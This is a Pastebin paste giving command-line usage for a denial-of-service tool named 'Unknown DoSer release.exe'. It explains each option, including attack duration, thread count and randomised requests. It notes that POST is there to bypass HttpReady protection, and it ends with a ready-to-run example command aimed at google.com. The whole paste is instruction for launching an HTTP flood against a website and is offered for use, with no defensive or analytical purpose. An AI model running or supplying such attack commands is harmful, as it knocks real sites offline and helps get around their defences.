djcamoable1

Command line

Oct 6th, 2012
251
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.72 KB | None | 0 0
  1. You can launch an attack simply by running the program & by setting the options or from a batch file:
  2.  
  3.  
  4. "Unknown DoSer release.exe" URL PORT METHOD RANDOMIZE_REQUEST TIMEOUT DURATION MAX_THREADS
  5.  
  6. URL [default:]: string, website's URL (e.g.: google.com)
  7. PORT [default:80]: int, website's port (e.g.: 80)
  8. METHOD [default:GET]: string, GET or POST (POST to bypass HttpReady) (e.g.: GET)
  9. RANDOMIZE_REQUEST [default:N]: string, randomize request, Y for Yes or N for No (e.g.: N)
  10. TIMEOUT [default:5]: int, send timeout in seconds (e.g.: 5)
  11. DURATION [default:120]: int, attack duration in seconds (e.g.: 120)
  12. MAX_THREADS [default:250]: int, number of threads (e.g.: 250)
  13.  
  14. "Unknown DoSer release.exe" google.com 80 GET N 5 120 250
Advertisement
Add Comment
Please, Sign In to add comment